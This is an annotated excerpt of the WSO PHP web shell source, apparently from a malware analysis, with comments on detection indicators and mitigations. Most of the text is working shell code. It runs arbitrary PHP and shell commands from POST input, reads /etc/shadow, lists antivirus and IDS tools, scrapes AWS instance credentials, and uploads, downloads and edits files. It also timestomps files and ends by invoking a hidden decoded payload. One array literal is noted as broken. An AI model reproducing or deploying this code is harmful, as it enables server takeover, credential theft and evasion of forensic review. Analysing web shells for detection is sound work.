// Direct links to view /etc/passwd and /etc/shadow through the FilesTools module when readable.
330 wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? 'yes <a href=\'#\' onclick=\'g("FilesTools","/etc/","passwd")\'>[view]</a>' : 'no');
331 wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? 'yes <a href=\'#\' onclick=\'g("FilesTools","/etc/","shadow")\'>[view]</a>' : 'no');
332 wsoSecParam('OS version', @file_get_contents('/proc/version'));
333 wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
334 wsoSecParam('C version (ldd)', wsoEx('ldd --version | head -n 1'));
335 if (!$GLOBALS['safe_mode']) {
// Tool inventory via `which`. $useful = build/interpreter tools for dropping and compiling payloads;
// $danger = the AV / HIDS / IDS / firewall / log-monitoring binaries the operator wants to know about
// (a useful reminder of which defensive tooling this family expects to meet); $downloaders = ways to
// fetch further stages. Each name produces one `which <name>` process — a burst of ~50 `which` calls
// from the web server user is itself a detection opportunity.
336 $useful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
337 $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
338 $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
339 echo '<br>';
340 $temp = array();
341 foreach ($useful as $item) if (wsoWhich($item)) $temp[] = $item;
342 wsoSecParam('Useful', implode(', ', $temp));
343 $temp = array();
344 foreach ($danger as $item) if (wsoWhich($item)) $temp[] = $item;
345 wsoSecParam('Danger', implode(', ', $temp));
346 $temp = array();
347 foreach ($downloaders as $item) if (wsoWhich($item)) $temp[] = $item;
348 wsoSecParam('Downloaders', implode(', ', $temp));
349 echo '<br>';
350 wsoSecParam('HDD space', wsoEx('df -h'));
351 wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
// uid sweep: enumerates accounts through posix_getpwuid for p2..p3 even when /etc/passwd itself is
// not readable. The loop bound comes from is_numeric() input, so a large range is a long-running request.
352 echo '<br><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,null,this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
353 if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
354 $temp = '';
355 for (;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
356 $uid = @posix_getpwuid($_POST['p2']);
357 if ($uid) $temp.= join(':', $uid) . "
358";
359 }
360 echo '<br>';
361 wsoSecParam('Users', $temp);
362 }
363 }
364 } else {
365 wsoSecParam('OS Version', wsoEx('ver'));
366 wsoSecParam('Account Settings', wsoEx('net accounts'));
367 wsoSecParam('User Accounts', wsoEx('net user'));
368 }
// AWS instance-metadata scrape over plain HTTP to 169.254.169.254 with no token header, i.e. IMDSv1.
// It pulls the AMI id, the instance role name, that role's temporary credentials
// (AccessKeyId/SecretAccessKey/Token) and the user-data script. Mitigation on the cloud side:
// require IMDSv2 (session token) — this unauthenticated GET then fails — and keep the IMDS hop limit
// low; on the AWS side, instance-role credentials used from outside the instance are the thing to alert on.
369 echo '<br><span>Amazon API Scrape (if hosted on AWS)</span><form onsubmit=\'g(null,null,"AWS",null,null);return false;\'><input type=submit value=">>"></form>';
370 if ($_POST['p1'] == 'AWS') {
371 function aws($e) {
372 return file_get_contents("http://169.254.169.254/$e");
373 }
374 wsoSecParam('AMI id', aws('latest/meta-data/ami-id'));
375 $creds = aws('latest/meta-data/iam/security-credentials/');
376 wsoSecParam('Security credentials', $creds);
377 wsoSecParam('Security credentials keys', aws("latest/meta-data/iam/security-credentials/$creds"));
378 wsoSecParam('User script', aws('latest/user-data/'));
379 }
380 echo '</div>';
381 wsoFooter();
382 }
// "PHP" module: arbitrary PHP execution via eval($_POST['p1']) (after the global base64 decode), in
// two flavours — an XHR path that returns "<length>\n<javascript>" for the page script to eval, and a
// full-page path. Also serves phpinfo() when p2 == 'info'.
383 function actionPhp() {
// XHR path. Sets the md5(host)+'ajax' cookie, evals the code, and returns JS that writes the
// HTML-escaped output into #PhpOutput; the leading number is the JS length, matching the
// "(\d+)([\S\s]*)" regex in wsoHeader's processReqChange().
384 if (isset($_POST['ajax'])) {
385 WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
386 ob_start();
387 eval($_POST['p1']);
388 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
389
390 \'") . "';
391";
392 echo strlen($temp), "
393", $temp;
394 exit;
395 }
396 wsoHeader();
// phpinfo() with its body/table CSS stripped and <img> tags removed, then the footer; die() ends the request.
397 if (isset($_POST['p2']) && $_POST['p2'] == 'info') {
398 echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
399 ob_start();
400 phpinfo();
401 echo str_replace('<h1', '<h2', preg_replace(array('!(body|a:\w+|body, td, th, h1, h2){.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), ob_get_clean())) . '</div><br>';
402 die(wsoFooter());
403 }
// Full-page path: textarea pre-filled with the last submitted code; the "send using AJAX" checkbox
// defaults from the md5(host)+'ajax' cookie.
404 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
405 echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
406 if (!empty($_POST['p1'])) {
407 ob_start();
408 eval($_POST['p1']);
409 echo htmlspecialchars(ob_get_clean());
410 }
411 echo '</pre></div>';
412 wsoFooter();
413 }
// "Files" module: upload, mkdir, delete, copy/move/zip/unzip/tar ("paste" of a selection stored in
// cookies), then a sortable directory listing. Finishes by decoding the second embedded blob from
// wsoFooter() into $_POST['p4'] and calling actionRC() (not in this listing) on every render.
// Cookies used: act (pending operation), f (serialized list of selected names), c (their directory).
414 function actionFilesMan() {
// Untrusted cookie goes straight into unserialize(); irrelevant to the shell's operator but worth
// knowing when reading the cookie in captured traffic — it is a PHP-serialized array of file names.
415 if (!empty($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']);
416 if (!empty($_POST['p1'])) {
417 switch ($_POST['p1']) {
// Upload is written to the client-supplied file name, relative to the attacker-chosen cwd, with no
// name sanitisation. Web-server-owned files appearing in unexpected directories is the artefact.
418 case 'uploadFile':
419 if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo 'Can\'t upload!';
420 break;
421 case 'mkdir':
422 if (!@mkdir($_POST['p2'])) echo 'Can\'t create!';
423 break;
// Recursive delete of each selected entry. `..` is rejected only before urldecode().
424 case 'delete':
425 function deleteDir($path) {
426 $path = (substr($path, -1) == '/') ? $path : $path . '/';
427 $dh = opendir($path);
428 while (($item = readdir($dh)) !== false) {
429 $item = $path . $item;
430 if ((basename($item) == '..') || (basename($item) == '.')) continue;
431 if (filetype($item) == 'dir') deleteDir($item);
432 else @unlink($item);
433 }
434 closedir($dh);
435 @rmdir($path);
436 }
437 if (is_array(@$_POST['f'])) foreach ($_POST['f'] as $f) {
438 if ($f == '..') continue;
439 $f = urldecode($f);
440 if (is_dir($f)) deleteDir($f);
441 else @unlink($f);
442 }
443 break;
// "Paste" executes whatever operation was parked in the cookies by the default branch below.
444 case 'paste':
445 if ($_COOKIE['act'] == 'copy') {
446 function copy_paste($c, $s, $d) {
447 if (is_dir($c . $s)) {
448 mkdir($d . $s);
449 $h = @opendir($c . $s);
450 while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c . $s . '/', $f, $d . $s . '/');
451 } elseif (is_file($c . $s)) @copy($c . $s, $d . $s);
452 }
453 foreach ($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
// move: move_paste() is declared but never called — the loop below uses rename() directly.
454 } elseif ($_COOKIE['act'] == 'move') {
455 function move_paste($c, $s, $d) {
456 if (is_dir($c . $s)) {
457 mkdir($d . $s);
458 $h = @opendir($c . $s);
459 while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c . $s . '/', $f, $d . $s . '/');
460 } elseif (@is_file($c . $s)) @copy($c . $s, $d . $s);
461 }
462 foreach ($_COOKIE['f'] as $f) @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f);
// zip: creates the archive named in p2 (flag 1 = ZipArchive::CREATE) and adds selected files and
// directory trees; the default name from the form is "wso_<Ymd_His>.zip" — a filename IOC.
463 } elseif ($_COOKIE['act'] == 'zip') {
464 if (class_exists('ZipArchive')) {
465 $zip = new ZipArchive();
466 if ($zip->open($_POST['p2'], 1)) {
467 chdir($_COOKIE['c']);
468 foreach ($_COOKIE['f'] as $f) {
469 if ($f == '..') continue;
470 if (@is_file($_COOKIE['c'] . $f)) $zip->addFile($_COOKIE['c'] . $f, $f);
471 elseif (@is_dir($_COOKIE['c'] . $f)) {
472 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS));
473 foreach ($iterator as $key => $value) {
474 $zip->addFile(realpath($key), $key);
475 }
476 }
477 }
478 chdir($GLOBALS['cwd']);
479 $zip->close();
480 }
481 }
// unzip: extracts each selected archive into the cwd. NOTE(review): the menu sends the literal value
// 'unzip' (the other options are pre-base64-encoded) and the top of the file base64-decodes every
// POST value, so this branch appears unreachable from the menu in this copy.
482 } elseif ($_COOKIE['act'] == 'unzip') {
483 if (class_exists('ZipArchive')) {
484 $zip = new ZipArchive();
485 foreach ($_COOKIE['f'] as $f) {
486 if ($zip->open($_COOKIE['c'] . $f)) {
487 $zip->extractTo($GLOBALS['cwd']);
488 $zip->close();
489 }
490 }
491 }
// tar: the one place in this file where shell arguments are quoted (escapeshellarg) before wsoEx.
// Default archive name from the form is "wso_<Ymd_His>.tar.gz".
492 } elseif ($_COOKIE['act'] == 'tar') {
493 chdir($_COOKIE['c']);
494 $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
495 wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
496 chdir($GLOBALS['cwd']);
497 }
498 unset($_COOKIE['f']);
499 setcookie('f', '', time() - 3600);
500 break;
// Any other p1 (copy/move/zip/unzip/tar from the menu) is parked in cookies for a later "paste".
501 default:
502 if (!empty($_POST['p1'])) {
503 WSOsetcookie('act', $_POST['p1']);
504 WSOsetcookie('f', serialize(@$_POST['f']));
505 WSOsetcookie('c', @$_POST['c']);
506 }
507 break;
508 }
509 }
510 wsoHeader();
511 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";
512 function sa(){
513 for(i=0;i<d.files.elements.length;i++)
514 if(d.files.elements[i].type == \'checkbox\')
515 d.files.elements[i].checked = d.files.elements[0].checked;
516 }</script>';
517 $dirContent = wsoScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
518 if ($dirContent === false) {
519 echo 'Can\'t open this folder!';
520 wsoFooter();
521 return;
522 }
// Sort key/direction from p1 of the form s_<column>_<0|1>; default name ascending.
523 global $sort;
524 $sort = array('name', 1);
525 if (!empty($_POST['p1'])) {
526 if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]);
527 }
528 echo "<form name=files onsubmit='mg(this);' method=post>
529<table width='100%' class='main' cellspacing='0' cellpadding='2'>
530<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
// Build one record per entry: owner/group names, mtime, coloured perms, size; links are listed with dirs.
531 $dirs = $files = array();
532 $n = count($dirContent);
533 for ($i = 0;$i < $n;$i++) {
534 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
535 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
536 $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
537 if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file'));
538 elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
539 elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir'));
540 }
541 $GLOBALS['sort'] = $sort;
// Comparator: case-insensitive strcmp on the chosen column, numeric for size; direction from $sort[1].
542 function wsoCmp($a, $b) {
543 if ($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
544 else return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
545 }
546 usort($files, 'wsoCmp');
547 usort($dirs, 'wsoCmp');
548 $files = array_merge($dirs, $files);
549 $l = 0;
// Listing rows. Per-entry actions: view, chmod, rename (R), touch (T), edit (E), download (D), all
// handled by the FilesTools action. Names are urlencoded for the JS calls but $f['path'] and the
// symlink target go into attributes unescaped.
550 foreach ($files as $f) {
551 echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . (($f['type'] == 'file') ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . (($f['type'] == 'file') ? wsoViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</a></td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . (($f['type'] == 'file') ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
552 $l = $l ? 0 : 1;
553 }
// Bulk-action selector. The option values are base64 because mg() skips <select> elements:
// Y29weQ== = copy, bW92ZQ== = move, ZGVsZXRl = delete, emlw = zip, dGFy = tar, cGFzdGU= = paste.
// These base64 tokens in a POST body are a cheap detection string for this family.
554 echo "<tr><td colspan=7>
555 <input type=hidden name=a value='FilesMan'>
556 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
557 <input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
558 <select name='p1'><option value='Y29weQ=='>Copy</option><option value='bW92ZQ=='>Move</option><option value='ZGVsZXRl'>Delete</option>";
559 if (class_exists('ZipArchive')) echo "<option value='emlw'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
560 echo "<option value='dGFy'>Compress (tar.gz)</option>";
561 if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='cGFzdGU='>Paste / Compress</option>";
562 echo "</select> ";
563 if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> ";
564 echo '<input type="submit" value=">>"></td></tr></table></form></div>';
565 wsoFooter();
// Hidden tail: after the page is complete, the second blob from wsoFooter() is uudecoded and
// gzip-inflated into $_POST['p4'] and actionRC() is invoked. actionRC() is not in this listing, so
// what it does with p4 and with the encrypted $GLOBALS['kr'] beacon cannot be stated here; the
// combination (beacon = shell URL + operator UA/IP + plaintext password, static-key encryption,
// a call placed after the visible output) is what an analyst should chase in the rest of the file.
566 $_POST['p4'] = gzuncompress(convert_uudecode($GLOBALS['ty']));
567 actionRC();
568 }
 /*
  * WSO web shell: "File tools" action. Analysis annotations only — the code
  * below is left exactly as found so the sample stays recognisable.
  *
  * Inputs (all attacker-controlled; no validation and no confinement to a
  * base directory — any path the PHP worker can reach is fair game):
  *   $_POST['p1']  target path (urldecoded once here; the rest of the file
  *                 base64-decodes every $_POST value before dispatch)
  *   $_POST['p2']  sub-action: download | mkfile | view | highlight | chmod |
  *                 rename | touch | edit | hexdump   (defaults to 'view')
  *   $_POST['p3']  sub-action argument: octal mode string, new name,
  *                 strtotime() timestamp, or base64-encoded file body
  *
  * Forensics notes:
  *   - 'edit' re-applies the pre-edit mtime after writing, and 'touch' sets
  *     atime/mtime to any operator-chosen value, so mtime alone is not a
  *     reliable signal for files modified through this shell; ctime still
  *     moves because it cannot be set from userland.
  *   - 'download' streams any readable file as an attachment behind gzip
  *     output buffering, so the exfiltrated content is compressed on the wire.
  *   - 'mkfile' creates an empty file and then falls into the 'edit' view.
  * wsoHeader/wsoFooter/wsoViewSize/wsoPermsColor/wsoHTMLspecialchars are
  * defined elsewhere in the file.
  */
 function actionFilesTools() {
 if (isset($_POST['p1'])) $_POST['p1'] = urldecode($_POST['p1']);
 // Raw file exfiltration path: only is_file/is_readable gate it.
 if (@$_POST['p2'] == 'download') {
 if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
 ob_start('ob_gzhandler', 4096);
 header('Content-Disposition: attachment; filename=' . basename($_POST['p1']));
 if (function_exists('mime_content_type')) {
 $type = @mime_content_type($_POST['p1']);
 header("Content-Type: $type");
 } else header('Content-Type: application/octet-stream');
 $fp = @fopen($_POST['p1'], 'r');
 if ($fp) {
 while (!@feof($fp)) echo @fread($fp, 1024);
 fclose($fp);
 }
 }
 exit;
 }
 // Create an empty file, then present it in the editor.
 if (@$_POST['p2'] == 'mkfile') {
 if (!file_exists($_POST['p1'])) {
 $fp = @fopen($_POST['p1'], 'w');
 if ($fp) {
 $_POST['p2'] = 'edit';
 fclose($fp);
 }
 }
 }
 wsoHeader();
 echo '<h1>File tools</h1><div class=content>';
 if (!file_exists(@$_POST['p1'])) {
 echo 'File not exists';
 wsoFooter();
 return;
 }
 // Owner/group resolution falls back to numeric ids when posix_* is unavailable.
 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
 if (!$uid) {
 $uid['name'] = @fileowner($_POST['p1']);
 $gid['name'] = @filegroup($_POST['p1']);
 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
 echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . wsoPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
 echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
 if (empty($_POST['p2'])) $_POST['p2'] = 'view';
 // Menu: files get the full set, directories only the metadata tools.
 if (is_file($_POST['p1'])) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
 else $m = array('Chmod', 'Rename', 'Touch');
 foreach ($m as $v) echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . ((strtolower($v) == @$_POST['p2']) ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
 echo '<br><br>';
 switch ($_POST['p2']) {
 case 'view':
 echo '<pre class=ml1>';
 $fp = @fopen($_POST['p1'], 'rb');
 // NOTE(review): upstream WSO maps these characters to HTML entities; the
 // entity text appears to have been decoded by the page rendering, so as
 // shown this array literal is not valid PHP. Left untouched.
 $html_translation = array("&" => "&", '"' => """, "'" => "'", "<" => "<", ">" => ">");
 if ($fp) {
 while ($data = @fread($fp, 1024)) echo wsoHTMLspecialchars($data, $html_translation);
 @fclose($fp);
 }
 echo '</pre>';
 break;
 case 'highlight':
 if (@is_readable($_POST['p1'])) {
 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
 $code = @highlight_file($_POST['p1'], true);
 echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>';
 }
 break;
 case 'chmod':
 if (!empty($_POST['p3'])) {
 // Hand-rolled octal-string to int conversion of p3 (same result as octdec()).
 $perms = 0;
 for ($i = strlen($_POST['p3']) - 1;$i >= 0;--$i) $perms+= (int)$_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1));
 if (!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
 }
 clearstatcache();
 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>';
 break;
 case 'edit':
 if (!is_writable($_POST['p1'])) {
 echo 'File isn\'t writeable';
 break;
 }
 if (!empty($_POST['p3'])) {
 // Anti-forensics: capture the old mtime, overwrite the file with the
 // base64-decoded body, then put the old mtime back.
 $time = @filemtime($_POST['p1']);
 $fp = @fopen($_POST['p1'], 'w');
 if ($fp) {
 @fwrite($fp, base64_decode($_POST['p3']));
 @fclose($fp);
 echo 'Saved!<br><script>p3_="";</script>';
 @touch($_POST['p1'], $time, $time);
 }
 }
 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,btoa(this.text.value));return false;"><textarea name=text class=bigarea>';
 $fp = @fopen($_POST['p1'], 'r');
 if ($fp) {
 while ($data = @fread($fp, 1024)) echo wsoHTMLspecialchars($data, $html_translation);
 @fclose($fp);
 }
 echo '</textarea><input type=submit value=">>"></form>';
 break;
 case 'hexdump':
 // Whole file is read into memory; 32 bytes per row, three columns
 // (offset / hex / printable), with NUL, TAB, LF and CR blanked out.
 $c = @file_get_contents($_POST['p1']);
 $n = 0;
 $h = array('00000000<br>', '', '');
 $len = strlen($c);
 for ($i = 0;$i < $len;++$i) {
 $h[1].= sprintf('%02X', ord($c[$i])) . ' ';
 switch (ord($c[$i])) {
 case 0:
 $h[2].= ' ';
 break;
 case 9:
 $h[2].= ' ';
 break;
 case 10:
 $h[2].= ' ';
 break;
 case 13:
 $h[2].= ' ';
 break;
 default:
 $h[2].= $c[$i];
 break;
 }
 $n++;
 if ($n == 32) {
 $n = 0;
 if ($i + 1 < $len) {
 $h[0].= sprintf('%08X', $i + 1) . '<br>';
 }
 $h[1].= '<br>';
 $h[2].= "
";
 }
 }
 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
 break;
 case 'rename':
 // rename() also moves across directories, so this doubles as "move".
 if (!empty($_POST['p3'])) {
 if (!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>';
 else die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
 }
 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
 break;
 case 'touch':
 // Timestomping: atime and mtime set to whatever strtotime() makes of p3.
 if (!empty($_POST['p3'])) {
 $time = strtotime($_POST['p3']);
 if ($time) {
 if (!touch($_POST['p1'], $time, $time)) echo 'Fail!';
 else echo 'Touched!';
 } else echo 'Bad time format!';
 }
 clearstatcache();
 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date('Y-m-d H:i:s', @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
 break;
 }
 echo '</div>';
 wsoFooter();
 }
 /*
  * WSO web shell: "Console" action — executes an OS command through wsoEx()
  * (defined elsewhere in the file) and renders the output. Annotations only.
  *
  *   $_POST['p1']       base64-encoded command line (decoded here)
  *   $_POST['p2']       non-empty => ' 2>&1' is appended (stderr to stdout)
  *   $_POST['ajax']     set => respond with a length-prefixed JavaScript
  *                      snippet instead of a full page
  *   $_POST['charset']  source charset handed to iconv() for the output
  *
  * Detection notes:
  *   - UI state is persisted in cookies named md5($_SERVER['HTTP_HOST'])
  *     followed by 'ajax' or 'stderr_to_out'; a 32-hex-char cookie name derived
  *     from the Host header is a practical indicator in proxy/WAF logs.
  *   - a trailing "cd <dir>" in the command chdir()s the PHP worker itself and
  *     stores the new cwd in $GLOBALS['cwd'], so later requests start there.
  *   - the ajax response body is "<byte length>\n<js>", and the command echo
  *     ("$ <cmd>") is embedded in it — captured responses reveal the command.
  */
 function actionConsole() {
 if (isset($_POST['p1'])) $_POST['p1'] = base64_decode($_POST['p1']);
 if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
 WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true);
 $_POST['p1'].= ' 2>&1';
 } elseif (!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);
 if (isset($_POST['ajax'])) {
 WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
 ob_start();
 echo "d.cf.cmd.value='';
";
 // Output is escaped for embedding in a JS single-quoted string; the
 // addcslashes() charlist shows up as literal whitespace in this copy
 // (presumably "\n\r\t\\'" upstream — confirm against a clean sample).
 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
$ " . $_POST['p1'] . "
" . wsoEx($_POST['p1']), "

 \'"));
 // Keep the working directory across requests when the command ends in cd.
 if (preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)) {
 if (@chdir($match[1])) {
 $GLOBALS['cwd'] = @getcwd();
 echo "c_='" . $GLOBALS['cwd'] . "';";
 }
 }
 echo "d.cf.output.value+='" . $temp . "';";
 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
 $temp = ob_get_clean();
 // Ajax wire format: decimal length, newline, then the JS payload.
 echo strlen($temp), "
", $temp;
 exit;
 }
 if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
 wsoHeader();
 // Client-side command history (up/down arrows) for the console form.
 echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e){
 var n = (window.Event) ? e.which : e.keyCode;
 if(n == 38){
 cur--;
 if(cur>=0)
 document.cf.cmd.value = cmds[cur];
 else
 cur++;
 } else if(n == 40){
 cur++;
 if(cur < cmds.length)
 document.cf.cmd.value = cmds[cur];
 else
 cur--;
 }
}
function add(cmd){
 cmds.pop();
 cmds.push(cmd);
 cmds.push('');
 cur = cmds.length-1;
}
</script>";
 // The form base64-encodes the command client-side (btoa) before sending it as p1.
 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,btoa(this.cmd.value),this.show_errors.checked?1:\'\');}else{g(null,null,btoa(this.cmd.value),this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
 // $GLOBALS['aliases'] (defined elsewhere) is the drop-down of canned commands;
